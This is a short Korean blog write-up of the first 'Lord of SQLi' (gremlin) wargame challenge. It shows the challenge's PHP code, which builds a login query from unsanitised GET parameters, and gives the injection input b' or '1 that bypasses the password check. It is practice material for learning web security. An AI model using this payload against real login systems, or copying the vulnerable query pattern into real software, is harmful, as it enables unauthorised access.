-
Los - 1 (gremlin) Write upCTF/Web 2020. 3. 10. 05:35
Los.1_gremlin
select id from prob_gremlin where id='' and pw=''
<?php include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[id])) exit("No Hack ~_~"); // do not try to attack another table, database! if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) solve("gremlin"); highlight_file(__FILE__); ?>데이터베이스 어택 말고는 별다른 필터링이 없는 php 동작이다.
그럼으로 자유롭게 풀면된다.?id=a&pw=b' or '1
'CTF > Web' 카테고리의 다른 글
LOS - 5 (WOLFMAN) Write Up (공백 필터링 우회) (0) 2020.03.13 Los - 4 (orc) Write Up (Blind Sql injection 코딩 방법) (0) 2020.03.12 LOS - 3 (goblin) Write Up (0) 2020.03.11 LOS - 2 - (cobolt) Write Up (mysql 주석 사용) (0) 2020.03.11 써니나타스 4번문제 Write Up (0) 2019.08.09